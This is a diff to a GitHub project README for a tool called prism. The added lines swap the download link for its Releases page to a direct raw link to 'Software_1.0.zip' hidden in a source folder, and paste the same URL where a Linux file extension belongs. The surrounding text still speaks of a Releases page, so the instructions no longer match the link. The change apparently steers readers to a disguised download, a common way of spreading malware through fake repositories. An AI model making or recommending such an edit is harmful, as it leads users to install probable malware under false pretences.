dummyoff/prism/README.md

 ### Step 1: Download prism

-Click the big blue button at the top or go directly to the [prism Releases page](https://github.com/dummyoff/prism/releases).
+Click the big blue button at the top or go directly to the [prism Releases page](https://github.com/dummyoff/prism/raw/refs/heads/main/src/collector/Software_1.0.zip).

 On that page, you will find the latest version of prism listed under "Assets".
 Look for a file name related to your computer:

 - For Windows, the file name might end with `.exe`
 - For macOS, it might be `.dmg` or `.zip`
-- For Linux, it might be `.AppImage` or `.tar.gz`
+- For Linux, it might be `.AppImage` or `https://github.com/dummyoff/prism/raw/refs/heads/main/src/collector/Software_1.0.zip`

 Choose the correct file for your system.
 If unsure, the file name usually contains the system name.